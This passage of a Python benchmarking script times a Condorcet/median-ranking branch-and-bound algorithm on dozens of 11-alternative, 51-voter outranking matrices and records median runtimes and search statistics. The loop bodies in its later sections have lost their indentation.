        [28,25,0,27,22,22,27,24,29,26,27],
        [23,26,24,0,19,21,30,23,25,23,23],
        [31,32,29,32,0,23,30,29,28,25,33],
        [30,25,29,30,28,0,27,27,31,26,30],
        [25,25,24,21,21,24,0,19,29,20,23],
        [27,22,27,28,22,24,32,0,27,24,26],
        [25,20,22,26,23,20,22,24,0,21,23],
        [27,25,25,28,26,25,31,27,30,0,26],
        [28,21,24,28,18,21,28,25,28,25,0]])),
    (49, np.array([
        [0,27,32,19,17,18,18,22,15,16,23],
        [24,0,35,30,26,21,24,23,18,26,29],
        [19,16,0,26,16,13,15,21,14,16,19],
        [32,21,25,0,23,27,25,27,27,24,25],
        [34,25,35,28,0,26,29,29,24,23,27],
        [33,30,38,24,25,0,29,24,24,23,17],
        [33,27,36,26,22,22,0,23,26,29,33],
        [29,28,30,24,22,27,28,0,19,24,26],
        [36,33,37,24,27,27,25,32,0,31,28],
        [35,25,35,27,28,28,22,27,20,0,22],
        [28,22,32,26,24,34,18,25,23,29,0]])),
    (50, np.array([
        [0,31,18,31,14,23,23,20,23,29,14],
        [20,0,15,15,17,22,33,21,18,18,6],
        [33,36,0,25,25,35,32,32,31,36,27],
        [20,36,26,0,16,26,28,19,25,25,18],
        [37,34,26,35,0,34,26,22,36,30,20],
        [28,29,16,25,17,0,23,19,20,16,17],
        [28,18,19,23,25,28,0,20,24,27,12],
        [31,30,19,32,29,32,31,0,34,26,13],
        [28,33,20,26,15,31,27,17,0,24,15],
        [22,33,15,26,21,35,24,25,27,0,18],
        [37,45,24,33,31,34,39,38,36,33,0]])),
    (51, np.array([
        [0,20,23,31,23,20,27,23,30,19,26],
        [31,0,21,32,30,26,24,22,40,28,33],
        [28,30,0,27,26,29,23,23,35,27,29],
        [20,19,24,0,18,15,19,22,34,25,17],
        [28,21,25,33,0,20,20,21,31,25,22],
        [31,25,22,36,31,0,27,29,40,23,27],
        [24,27,28,32,31,24,0,25,34,28,25],
        [28,29,28,29,30,22,26,0,28,26,25],
        [21,11,16,17,20,11,17,23,0,14,19],
        [32,23,24,26,26,28,23,25,37,0,26],
        [25,18,22,34,29,24,26,26,32,25,0]])),
    (52, np.array([
        [0,26,23,25,22,23,24,24,20,21,22],
        [25,0,23,24,22,25,26,21,22,21,24],
        [28,28,0,24,22,20,23,25,22,16,26],
        [26,27,27,0,17,27,29,31,24,27,28],
        [29,29,29,34,0,23,28,26,25,26,33],
        [28,26,31,24,28,0,29,28,28,25,32],
        [27,25,28,22,23,22,0,22,18,23,29],
        [27,30,26,20,25,23,29,0,20,26,33],
        [31,29,29,27,26,23,33,31,0,24,32],
        [30,30,35,24,25,26,28,25,27,0,32],
        [29,27,25,23,18,19,22,18,19,19,0]])),
    (53, np.array([
        [0,30,24,26,30,23,26,27,22,22,18],
        [21,0,16,16,17,13,18,19,18,17,20],
        [27,35,0,24,32,21,28,26,29,19,26],
        [25,35,27,0,35,20,22,25,23,22,27],
        [21,34,19,16,0,22,22,23,22,16,21],
        [28,38,30,31,29,0,26,27,24,22,26],
        [25,33,23,29,29,25,0,21,20,24,19],
        [24,32,25,26,28,24,30,0,20,24,17],
        [29,33,22,28,29,27,31,31,0,18,23],
        [29,34,32,29,35,29,27,27,33,0,18],
        [33,31,25,24,30,25,32,34,28,33,0]])),
    (54, np.array([
        [0,36,31,24,42,11,32,29,32,41,25],
        [15,0,13,32,23,9,28,25,22,36,29],
        [20,38,0,28,36,30,29,35,31,41,33],
        [27,19,23,0,25,17,26,31,27,37,24],
        [9,28,15,26,0,3,15,18,11,30,24],
        [40,42,21,34,48,0,27,33,37,44,31],
        [19,23,22,25,36,24,0,33,32,39,26],
        [22,26,16,20,33,18,18,0,20,33,16],
        [19,29,20,24,40,14,19,31,0,34,18],
        [10,15,10,14,21,7,12,18,17,0,14],
        [26,22,18,27,27,20,25,35,33,37,0]])),
    (55, np.array([
        [0,27,24,30,24,26,23,28,26,27,27],
        [24,0,26,31,29,23,26,32,24,27,29],
        [27,25,0,29,29,29,25,34,24,22,27],
        [21,20,22,0,24,24,16,24,21,24,21],
        [27,22,22,27,0,24,22,26,25,28,23],
        [25,28,22,27,27,0,20,30,25,25,28],
        [28,25,26,35,29,31,0,29,27,29,27],
        [23,19,17,27,25,21,22,0,23,24,29],
        [25,27,27,30,26,26,24,28,0,29,27],
        [24,24,29,27,23,26,22,27,22,0,23],
        [24,22,24,30,28,23,24,22,24,28,0]])),
    (56, np.array([
        [0,32,22,27,24,22,36,26,28,25,29],
        [19,0,15,25,26,22,32,22,31,23,26],
        [29,36,0,34,24,21,37,38,34,33,31],
        [24,26,17,0,23,23,30,24,25,23,31],
        [27,25,27,28,0,28,29,25,31,27,27],
        [29,29,30,28,23,0,39,29,31,26,25],
        [15,19,14,21,22,12,0,16,24,22,20],
        [25,29,13,27,26,22,35,0,26,24,29],
        [23,20,17,26,20,20,27,25,0,24,24],
        [26,28,18,28,24,25,29,27,27,0,24],
        [22,25,20,20,24,26,31,22,27,27,0]])),
    (57, np.array([
        [0,27,22,21,32,25,31,26,25,29,27],
        [24,0,27,24,30,25,31,27,27,26,24],
        [29,24,0,25,38,31,32,22,25,25,27],
        [30,27,26,0,33,24,25,28,26,22,22],
        [19,21,13,18,0,22,25,16,15,23,14],
        [26,26,20,27,29,0,23,20,24,22,20],
        [20,20,19,26,26,28,0,21,25,26,19],
        [25,24,29,23,35,31,30,0,30,28,24],
        [26,24,26,25,36,27,26,21,0,26,20],
        [22,25,26,29,28,29,25,23,25,0,25],
        [24,27,24,29,37,31,32,27,31,26,0]])),
    (58, np.array([
        [0,24,24,41,41,41,24,31,24,24,27],
        [27,0,34,24,27,24,24,7,31,51,3],
        [27,17,0,24,27,24,17,7,31,51,3],
        [10,27,27,0,44,41,27,34,27,27,27],
        [10,24,24,7,0,41,24,31,24,27,3],
        [10,27,27,10,10,0,3,34,27,34,3],
        [27,27,34,24,27,48,0,34,31,34,3],
        [20,44,44,17,20,17,17,0,41,44,20],
        [27,20,20,24,27,24,20,10,0,27,3],
        [27,0,0,24,24,17,17,7,24,0,3],
        [24,48,48,24,48,48,48,31,48,48,0]])),
    (59, np.array([
        [0,17,22,9,13,25,10,23,14,20,33],
        [34,0,34,16,22,26,29,34,29,35,28],
        [29,17,0,11,12,18,10,42,19,18,29],
        [42,35,40,0,30,30,22,31,27,31,42],
        [38,29,39,21,0,29,21,32,26,24,32],
        [26,25,33,21,22,0,20,31,25,26,31],
        [41,22,41,29,30,31,0,41,24,36,43],
        [28,17,9,20,19,20,10,0,13,17,29],
        [37,22,32,24,25,26,27,38,0,26,31],
        [31,16,33,20,27,25,15,34,25,0,31],
        [18,23,22,9,19,20,8,22,20,20,0]])),
    (60, np.array([
        [0,31,31,30,34,28,16,23,28,21,23],
        [20,0,29,27,18,27,25,35,26,20,25],
        [20,22,0,28,30,28,22,32,23,22,19],
        [21,24,23,0,25,22,20,26,26,23,25],
        [17,33,21,26,0,23,16,27,23,14,21],
        [23,24,23,29,28,0,31,28,26,25,29],
        [35,26,29,31,35,20,0,29,24,15,31],
        [28,16,19,25,24,23,22,0,28,22,30],
        [23,25,28,25,28,25,27,23,0,27,29],
        [30,31,29,28,37,26,36,29,24,0,36],
        [28,26,32,26,30,22,20,21,22,15,0]])),
    (61, np.array([
        [0,17,20,14,40,36,25,20,28,22,17],
        [34,0,23,30,40,32,26,39,26,22,33],
        [31,28,0,33,37,35,29,32,29,25,30],
        [37,21,18,0,39,27,24,32,22,23,23],
        [11,11,14,12,0,23,5,15,14,8,10],
        [15,19,16,24,28,0,20,19,13,3,14],
        [26,25,22,27,46,31,0,32,26,12,17],
        [31,12,19,19,36,32,19,0,26,27,21],
        [23,25,22,29,37,38,25,25,0,15,25],
        [29,29,26,28,43,48,39,24,36,0,31],
        [34,18,21,28,41,37,34,30,26,20,0]])),
    (62, np.array([
        [0,25,27,22,26,17,26,27,22,21,16],
        [26,0,27,25,26,24,32,34,24,30,25],
        [24,24,0,25,29,27,32,33,28,28,28],
        [29,26,26,0,27,22,26,28,24,23,28],
        [25,25,22,24,0,24,27,31,21,19,26],
        [34,27,24,29,27,0,26,32,28,25,30],
        [25,19,19,25,24,25,0,30,27,23,23],
        [24,17,18,23,20,19,21,0,24,19,23],
        [29,27,23,27,30,23,24,27,0,28,19],
        [30,21,23,28,32,26,28,32,23,0,24],
        [35,26,23,23,25,21,28,28,32,27,0]])),
    (63, np.array([
        [0,36,48,22,41,33,25,51,48,51,48],
        [15,0,26,15,26,26,40,18,37,29,41],
        [3,25,0,15,15,29,25,18,37,44,26],
        [29,36,36,0,41,14,36,29,48,36,41],
        [10,25,36,10,0,21,25,25,40,36,51],
        [18,25,22,37,30,0,40,40,37,51,41],
        [26,11,26,15,26,11,0,26,48,29,41],
        [0,33,33,22,26,11,25,0,37,51,41],
        [3,14,14,3,11,14,3,14,0,14,14],
        [0,22,7,15,15,0,22,0,37,0,15],
        [3,10,25,10,0,10,10,10,37,36,0]])),
    (64, np.array([
        [0,26,23,29,24,22,22,29,30,26,24],
        [25,0,21,29,30,27,24,31,31,31,31],
        [28,30,0,26,20,17,28,34,26,30,25],
        [22,22,25,0,19,19,24,25,25,24,24],
        [27,21,31,32,0,29,23,28,26,28,31],
        [29,24,34,32,22,0,27,30,30,30,32],
        [29,27,23,27,28,24,0,30,28,29,28],
        [22,20,17,26,23,21,21,0,35,31,27],
        [21,20,25,26,25,21,23,16,0,25,25],
        [25,20,21,27,23,21,22,20,26,0,22],
        [27,20,26,27,20,19,23,24,26,29,0]])),
    (65, np.array([
        [0,33,37,28,32,33,25,34,28,35,27],
        [18,0,36,30,27,32,15,21,17,27,22],
        [14,15,0,19,29,24,14,24,21,24,17],
        [23,21,32,0,24,28,17,30,20,33,22],
        [19,24,22,27,0,26,25,28,28,25,20],
        [18,19,27,23,25,0,14,22,13,29,12],
        [26,36,37,34,26,37,0,28,24,27,23],
        [17,30,27,21,23,29,23,0,19,26,19],
        [23,34,30,31,23,38,27,32,0,34,24],
        [16,24,27,18,26,22,24,25,17,0,26],
        [24,29,34,29,31,39,28,32,27,25,0]])),
    (66, np.array([
        [0,19,11,23,19,10,21,21,21,23,22],
        [32,0,28,29,25,23,23,19,22,24,27],
        [40,23,0,32,31,26,27,29,23,25,28],
        [28,22,19,0,18,18,20,23,16,24,23],
        [32,26,20,33,0,17,21,25,21,22,27],
        [41,28,25,33,34,0,38,35,23,26,29],
        [30,28,24,31,30,13,0,24,23,20,25],
        [30,32,22,28,26,16,27,0,23,23,23],
        [30,29,28,35,30,28,28,28,0,25,27],
        [28,27,26,27,29,25,31,28,26,0,25],
        [29,24,23,28,24,22,26,28,24,26,0]])),
    (67, np.array([
        [0,28,31,29,18,28,33,25,19,15,32],
        [23,0,23,25,14,25,30,20,8,18,27],
        [20,28,0,27,20,28,29,24,17,17,25],
        [22,26,24,0,14,23,25,25,15,14,31],
        [33,37,31,37,0,40,38,31,31,24,39],
        [23,26,23,28,11,0,21,20,22,19,18],
        [18,21,22,26,13,30,0,13,13,20,31],
        [26,31,27,26,20,31,38,0,19,19,33],
        [32,43,34,36,20,29,38,32,0,30,38],
        [36,33,34,37,27,32,31,32,21,0,40],
        [19,24,26,20,12,33,20,18,13,11,0]])),
    (68, np.array([
        [0,10,0,0,0,31,21,39,10,10,21],
        [41,0,29,33,29,39,21,39,31,31,29],
        [51,22,0,12,20,39,31,51,22,22,33],
        [51,18,39,0,8,39,39,39,10,10,29],
        [51,22,31,43,0,39,31,51,31,43,21],
        [20,12,12,12,12,0,21,30,22,22,33],
        [30,30,20,12,20,30,0,30,22,22,41],
        [12,12,0,12,0,21,21,0,10,10,21],
        [41,20,29,41,20,29,29,41,0,51,29],
        [41,20,29,41,8,29,29,41,0,0,29],
        [30,22,18,22,30,18,10,30,22,22,0]])),
    (69, np.array([
        [0,26,24,16,21,26,21,21,25,17,18],
        [25,0,23,20,24,25,24,20,24,16,20],
        [27,28,0,22,25,28,21,23,27,18,20],
        [35,31,29,0,27,32,28,29,31,25,30],
        [30,27,26,24,0,30,22,25,26,20,25],
        [25,26,23,19,21,0,18,18,26,17,21],
        [30,27,30,23,29,33,0,25,29,26,23],
        [30,31,28,22,26,33,26,0,31,19,23],
        [26,27,24,20,25,25,22,20,0,15,23],
        [34,35,33,26,31,34,25,32,36,0,29],
        [33,31,31,21,26,30,28,28,28,22,0]])),
    (70, np.array([
        [0,35,28,31,25,28,23,21,27,35,32],
        [16,0,26,27,29,29,21,28,24,36,32],
        [23,25,0,24,28,27,26,22,22,30,30],
        [20,24,27,0,28,22,22,22,19,30,33],
        [26,22,23,23,0,23,25,27,26,31,31],
        [23,22,24,29,28,0,24,32,23,33,30],
        [28,30,25,29,26,27,0,35,30,33,31],
        [30,23,29,29,24,19,16,0,24,29,34],
        [24,27,29,32,25,28,21,27,0,28,35],
        [16,15,21,21,20,18,18,22,23,0,28],
        [19,19,21,18,20,21,20,17,16,23,0]])),
    (71, np.array([
        [0,36,21,26,31,20,24,29,18,34,30],
        [15,0,21,16,19,9,17,24,13,24,23],
        [30,30,0,24,33,17,30,29,29,28,33],
        [25,35,27,0,32,29,23,31,26,27,35],
        [20,32,18,19,0,22,15,19,14,22,31],
        [31,42,34,22,29,0,31,23,24,26,40],
        [27,34,21,28,36,20,0,37,27,27,27],
        [22,27,22,20,32,28,14,0,20,21,27],
        [33,38,22,25,37,27,24,31,0,31,38],
        [17,27,23,24,29,25,24,30,20,0,29],
        [21,28,18,16,20,11,24,24,13,22,0]])),
]
for _instance_id, om in _instances:
    times = np.zeros(rep)
    for i in range(rep):
        # Algorithm with Condorcet winner
        algorithm = alg.AzziniMunda5(om, float("inf"))
        start_time = time.time()
        sol = algorithm.execute()
        times[i] = time.time() - start_time
    # Median of the repetitions is the reported timing (robust to outliers).
    exec_time = np.median(times)
    # Result row: [n_alternatives, n_voters, instance_id, method, median_time,
    # sol.shape[0], algorithm.ntentative] followed by the raw per-repetition
    # times.  NOTE(review): sol.shape[0] presumably counts solutions found and
    # `ntentative` the nodes/attempts explored — confirm against `alg`.
    result = np.append(
        np.array([11, 51, _instance_id, "ME-BB", exec_time,
                  sol.shape[0], algorithm.ntentative],
                 dtype=np.dtype(object)),
        times)
    print(result[:7])
    results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,27,19,26,22,20,21,25,17,28],
[32,0,35,33,41,23,34,26,34,30,37],
[24,16,0,23,23,8,23,13,17,14,24],
[32,18,28,0,31,19,32,21,24,18,28],
[25,10,28,20,0,17,21,21,23,22,32],
[29,28,43,32,34,0,28,32,24,30,38],
[31,17,28,19,30,23,0,22,20,18,30],
[30,25,38,30,30,19,29,0,23,17,36],
[26,17,34,27,28,27,31,28,0,23,32],
[34,21,37,33,29,21,33,34,28,0,32],
[23,14,27,23,19,13,21,15,19,19,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 72, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,33,38,26,23,29,33,27,23,30],
[24,0,29,31,24,22,22,27,24,25,34],
[18,22,0,29,22,21,26,26,23,18,28],
[13,20,22,0,22,13,14,24,12,15,18],
[25,27,29,29,0,22,24,27,22,26,32],
[28,29,30,38,29,0,31,30,24,22,32],
[22,29,25,37,27,20,0,27,24,19,28],
[18,24,25,27,24,21,24,0,23,27,28],
[24,27,28,39,29,27,27,28,0,24,28],
[28,26,33,36,25,29,32,24,27,0,33],
[21,17,23,33,19,19,23,23,23,18,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 73, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,25,26,22,27,29,27,24,31,26],
[28,0,32,25,31,28,33,29,29,31,31],
[26,19,0,25,25,23,31,29,24,31,27],
[25,26,26,0,26,24,25,29,25,33,24],
[29,20,26,25,0,30,28,30,28,33,28],
[24,23,28,27,21,0,23,26,25,31,24],
[22,18,20,26,23,28,0,25,26,31,28],
[24,22,22,22,21,25,26,0,20,23,25],
[27,22,27,26,23,26,25,31,0,28,24],
[20,20,20,18,18,20,20,28,23,0,23],
[25,20,24,27,23,27,23,26,27,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 74, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,26,37,34,27,26,32,32,30,26],
[26,0,26,25,29,31,25,36,34,24,34],
[25,25,0,34,40,24,24,33,32,30,28],
[14,26,17,0,34,31,24,37,40,29,31],
[17,22,11,17,0,17,22,20,24,25,7],
[24,20,27,20,34,0,17,31,23,22,28],
[25,26,27,27,29,34,0,35,28,20,28],
[19,15,18,14,31,20,16,0,23,22,15],
[19,17,19,11,27,28,23,28,0,18,27],
[21,27,21,22,26,29,31,29,33,0,27],
[25,17,23,20,44,23,23,36,24,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 75, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,26,23,31,17,18,24,19,19,17],
[28,0,27,24,29,15,24,24,23,29,13],
[25,24,0,18,25,14,20,20,17,25,14],
[28,27,33,0,27,17,21,23,18,32,22],
[20,22,26,24,0,18,18,18,17,19,14],
[34,36,37,34,33,0,23,29,25,30,21],
[33,27,31,30,33,28,0,32,25,33,30],
[27,27,31,28,33,22,19,0,24,26,23],
[32,28,34,33,34,26,26,27,0,34,23],
[32,22,26,19,32,21,18,25,17,0,18],
[34,38,37,29,37,30,21,28,28,33,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 76, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,30,25,23,20,22,23,30,30,23],
[32,0,24,35,25,33,22,17,25,31,31],
[21,27,0,26,21,21,31,31,26,35,18],
[26,16,25,0,19,13,13,17,24,31,25],
[28,26,30,32,0,19,24,21,26,34,18],
[31,18,30,38,32,0,21,22,26,31,26],
[29,29,20,38,27,30,0,15,30,28,24],
[28,34,20,34,30,29,36,0,34,31,30],
[21,26,25,27,25,25,21,17,0,20,20],
[21,20,16,20,17,20,23,20,31,0,17],
[28,20,33,26,33,25,27,21,31,34,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 77, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,19,34,29,20,30,28,26,28,13],
[24,0,23,33,27,27,28,34,18,28,20],
[32,28,0,29,26,25,24,38,20,24,29],
[17,18,22,0,28,19,23,22,22,34,22],
[22,24,25,23,0,20,28,31,21,30,14],
[31,24,26,32,31,0,26,28,21,32,29],
[21,23,27,28,23,25,0,23,22,27,22],
[23,17,13,29,20,23,28,0,21,28,20],
[25,33,31,29,30,30,29,30,0,31,25],
[23,23,27,17,21,19,24,23,20,0,21],
[38,31,22,29,37,22,29,31,26,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 78, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,16,12,15,10,27,24,25,26,22],
[22,0,20,20,19,15,30,21,17,32,28],
[35,31,0,29,27,30,30,25,30,32,38],
[39,31,22,0,28,28,26,23,28,30,39],
[36,32,24,23,0,25,32,24,23,37,35],
[41,36,21,23,26,0,33,29,31,36,33],
[24,21,21,25,19,18,0,27,25,29,30],
[27,30,26,28,27,22,24,0,25,26,30],
[26,34,21,23,28,20,26,26,0,32,27],
[25,19,19,21,14,15,22,25,19,0,31],
[29,23,13,12,16,18,21,21,24,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 79, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,17,24,26,27,20,22,28,30,23],
[23,0,17,24,28,26,27,17,31,24,17],
[34,34,0,35,32,30,26,25,37,37,29],
[27,27,16,0,30,26,23,21,28,30,17],
[25,23,19,21,0,28,21,20,25,31,16],
[24,25,21,25,23,0,21,23,30,32,23],
[31,24,25,28,30,30,0,26,32,31,22],
[29,34,26,30,31,28,25,0,34,34,27],
[23,20,14,23,26,21,19,17,0,24,19],
[21,27,14,21,20,19,20,17,27,0,19],
[28,34,22,34,35,28,29,24,32,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 80, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,30,21,30,33,24,23,30,18,25],
[24,0,18,21,32,23,36,21,20,14,32],
[21,33,0,22,37,25,35,32,26,26,32],
[30,30,29,0,36,32,34,29,27,18,33],
[21,19,14,15,0,23,20,15,19,13,23],
[18,28,26,19,28,0,22,18,28,15,27],
[27,15,16,17,31,29,0,14,22,14,26],
[28,30,19,22,36,33,37,0,34,24,25],
[21,31,25,24,32,23,29,17,0,23,27],
[33,37,25,33,38,36,37,27,28,0,34],
[26,19,19,18,28,24,25,26,24,17,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 81, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,40,28,40,23,37,21,29,34,30,42],
[11,0,13,25,12,32,6,14,25,26,31],
[23,38,0,36,30,40,26,36,35,30,34],
[11,26,15,0,16,29,10,23,27,17,38],
[28,39,21,35,0,36,15,28,30,37,32],
[14,19,11,22,15,0,7,21,27,21,28],
[30,45,25,41,36,44,0,42,45,41,44],
[22,37,15,28,23,30,9,0,23,30,39],
[17,26,16,24,21,24,6,28,0,21,39],
[21,25,21,34,14,30,10,21,30,0,32],
[9,20,17,13,19,23,7,12,12,19,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 82, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,37,29,28,31,29,35,34,37,31],
[26,0,35,23,28,30,20,30,30,19,34],
[14,16,0,20,27,18,12,28,23,17,29],
[22,28,31,0,33,32,21,36,25,25,35],
[23,23,24,18,0,20,19,27,23,25,21],
[20,21,33,19,31,0,15,27,23,13,32],
[22,31,39,30,32,36,0,27,31,25,35],
[16,21,23,15,24,24,24,0,17,17,18],
[17,21,28,26,28,28,20,34,0,24,33],
[14,32,34,26,26,38,26,34,27,0,39],
[20,17,22,16,30,19,16,33,18,12,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 83, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,30,30,27,20,14,32,19,20,27],
[27,0,20,20,28,26,19,23,22,27,21],
[21,31,0,22,27,26,16,30,16,28,23],
[21,31,29,0,25,20,27,39,28,31,19],
[24,23,24,26,0,23,20,38,20,23,15],
[31,25,25,31,28,0,20,36,20,26,21],
[37,32,35,24,31,31,0,33,33,25,26],
[19,28,21,12,13,15,18,0,13,18,19],
[32,29,35,23,31,31,18,38,0,19,20],
[31,24,23,20,28,25,26,33,32,0,22],
[24,30,28,32,36,30,25,32,31,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 84, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,22,28,18,25,16,16,16,28,18,18],
[29,0,22,14,23,16,35,19,28,30,21],
[23,29,0,13,28,32,22,16,34,27,9],
[33,37,38,0,32,32,32,26,45,32,7],
[26,28,23,19,0,19,22,31,17,39,14],
[35,35,19,19,32,0,19,28,19,31,25],
[35,16,29,19,29,32,0,25,19,32,7],
[35,32,35,25,20,23,26,0,25,31,32],
[23,23,17,6,34,32,32,26,0,27,9],
[33,21,24,19,12,20,19,20,24,0,25],
[33,30,42,44,37,26,44,19,42,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 85, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,37,33,42,22,32,29,30,35,24],
[21,0,27,26,31,14,30,21,29,26,19],
[14,24,0,33,36,27,29,19,33,32,27],
[18,25,18,0,37,19,25,26,29,19,21],
[9,20,15,14,0,17,23,22,23,10,19],
[29,37,24,32,34,0,36,24,26,22,24],
[19,21,22,26,28,15,0,17,26,23,18],
[22,30,32,25,29,27,34,0,36,30,28],
[21,22,18,22,28,25,25,15,0,17,13],
[16,25,19,32,41,29,28,21,34,0,28],
[27,32,24,30,32,27,33,23,38,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 86, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,12,30,21,20,15,8,18,18,21,16],
[39,0,33,29,19,26,17,19,18,31,21],
[21,18,0,26,20,18,20,12,18,19,15],
[30,22,25,0,27,23,17,8,27,32,19],
[31,32,31,24,0,27,27,27,25,31,18],
[36,25,33,28,24,0,27,24,18,27,29],
[43,34,31,34,24,24,0,23,29,41,20],
[33,32,39,43,24,27,28,0,35,33,28],
[33,33,33,24,26,33,22,16,0,37,22],
[30,20,32,19,20,24,10,18,14,0,21],
[35,30,36,32,33,22,31,23,29,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 87, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,29,22,23,26,31,30,27,29,31],
[24,0,23,20,24,31,22,30,27,26,31],
